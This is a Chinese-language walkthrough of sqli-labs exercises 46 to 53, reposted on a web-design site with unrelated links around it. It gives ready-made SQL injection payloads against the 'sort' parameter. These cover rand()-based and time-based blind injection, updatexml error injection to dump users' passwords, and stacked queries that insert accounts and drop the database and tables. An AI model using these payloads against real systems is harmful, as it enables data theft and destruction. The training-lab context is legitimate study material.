当前位置: 首页 > news >正文

东明网站制作专业建站

东明网站制作,专业建站,ps个人网站,有个专门做装修的网站目录 less46(数字型rand布尔盲注) less47(报错注入) less48(数字型时间盲注) less49(单引号时间盲注) less50(整数堆叠) less51(单引号堆叠…

目录

less46(数字型rand布尔盲注)

less47(报错注入)

less48(数字型时间盲注)

less49(单引号时间盲注)

less50(整数堆叠)

less51(单引号堆叠)

less52(整数堆叠)

less53(单引号堆叠)



less46(数字型rand布尔盲注)

通过get传参sort

发现1,则按第一列排序

2,则按第二列排序

3,则按第三列排序

所以其实就是一个order by语句的作用

利用order by rand()注入,即sort=rand()

sort=rand(1),当布尔值为真时,页面返回:

sort=rand(0),当布尔值为假时,页面返回:

利用这个特性,利用布尔盲注:

?sort=rand(length(database())=8)——爆数据库名长度

发现当参数为8时,返回页面和rand(1)一样,即布尔值为1,所以数据库名长度为8

?sort=rand(substr((select database()),1,1)='s')——爆数据库名

?sort=rand(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e')——爆表名

?sort=rand(substr((select column_name from information_schema.columns where table_name='users' and table_schema='security' limit 0,1),1,1)='i')——爆字段名

?sort=rand(substr((select password from security.users limit 0,1),1,1)='1')——爆数据



less47(报错注入)

?sort=1'报错——判断为单引号闭合

?sort=1'--+正常回显——确定为单引号闭合

利用报错信息,做报错注入:

?sort=1' or updatexml(1,concat(0x7e,(database()),0x7e),1)--+——爆数据库:

?sort=1' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+——爆表名

?sort=1' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),0x7e),1)--+——爆字段名

?sort=1' or updatexml(1,concat(0x7e,(select group_concat(id,username,password) from security.users),0x7e),1)--+——爆数据



less48(数字型时间盲注)

这关是数字型,和less46类似。但是这关没有报错信息,只能盲注 。

可以直接用less46关的rand布尔盲注,也可以使用时间盲注。这关演示时间盲注:

?sort=1 and if((length(database())=8),sleep(5),1)--+——爆数据库名长度

?sort=1 and if((substr((select database()),1,1)='s'),sleep(5),1)--+——爆数据库

?sort=1 and if((substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='a'),sleep(5),1)--+——爆表

?sort=1 and if((substr((select column_name from information_schema.columns where table_name='users' and table_schema='security' limit 0,1),1,1)='a'),sleep(5),1)--+——爆字段

?sort=1 and if((substr((select password from security.users limit 0,1),1,1)='1'),sleep(5),1)--+——爆数据



less49(单引号时间盲注)

这关和less47类似,都是单引号闭合,但是这关没有报错信息,不能使用报错注入,只能使用时间盲注。

?sort=1' and if(length(database())=8,sleep(5),1)--+——爆数据库名长度

?sort=1' and if(substr((select database()),1,1)='s',sleep(5),1)--+——爆数据库

?sort=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),1)--+——爆表

?sort=1' and if(substr((select column_name from information_schema.columns where table_name='users' and table_schema='security' limit 0,1),1,1)='i',sleep(5),1)--+——爆字段名

?sort=1' and if(substr((select password from security.users limit 0,1),1,1)='1',sleep(5),1)--+——爆数据



less50(整数堆叠)

这关爆库方法和less46一模一样,不做赘述,这里考察的是堆叠注入。

首先判断好闭合类型——数字型

然后利用堆叠注入:

?sort=1;insert users(username,password) values('hello','123');

?sort=1;drop database security;

?sort=1;drop table users;



less51(单引号堆叠)

?sort=1'报错——判断为单引号闭合

?sort=1'--+正常回显——确定为单引号闭合

利用堆叠注入:

?sort=1';insert users(username,password) values('hello','123');

?sort=1';drop database security;

?sort=1';drop table users;



less52(整数堆叠)

尝试各种闭合均不行,初步判断为数字型

然后利用堆叠注入:

?sort=1;insert users(username,password) values('hello','123');

?sort=1;drop database security;

?sort=1;drop table users;



less53(单引号堆叠)

?sort=1'报错

?sort=1'--+正常回显——判断为单引号闭合

利用堆叠注入:

?sort=1';insert users(username,password) values('hello','123');

?sort=1';drop database security;

?sort=1';drop table users;



http://www.yayakq.cn/news/25061/

相关文章:

  • 网站开发网上接单wordpress 极简 主题
  • 从化市营销型网站建设wordpress 如何结合vue
  • 网站 全屏幻灯片高端网站建设口碑
  • 全国最大型网站建设网站运营与建设作业
  • 电商行业网站建设及维护网页制作的开发平台
  • 卦神岭做网站willfast优化工具下载
  • 个人响应式网站重庆企业年报网上申报入口
  • 如何快速提高网站关键词排名世界500强企业关于优秀员工的12条核心标准
  • 很有设计感的企业网站中国纪检监察报简介
  • 备份整个网站做一个新公司网站要多少钱
  • 无锡网站建设哪家公司好宣传册设计公司
  • 免费网站建设步骤淄博网站
  • 怎么做自己的网站主页劳务派遣做网站有必要吗
  • 做网站毕业答辩会问什么反邪手机网站建设方案
  • 做网店有哪些拿货网站优秀交互设计网站
  • 个人做网站用哪个主机好建设银行手机银行网站用户名
  • com网站域名可以是汉字吗足球比赛直播2021欧冠决赛
  • 免费自己制作网站方法游戏怎么开科技
  • 建设网站怎么收费wordpress 无法在线升级
  • 有关做有机肥的企业网站做数码后期上数码网站
  • 网站素材大全北京装修公司口碑最好的是哪家
  • 网站模板 黑白小程序制作实惠首选华网天下
  • 城阳做网站找哪家好网站的风格设计
  • 平台网站开发是什么意思wordpress前台加速
  • 网页图片批量下载seo网站推广的主要目的是什么
  • 怎样建设VR网站济宁推广
  • 网站建设开发软件哪些是+joomla做的网站
  • 免费网站搭建系统自己怎样做海外网站
  • 沈阳网站优化建设昵图网素材图库免费下载
  • 南坪做网站跨境电商需要投资多少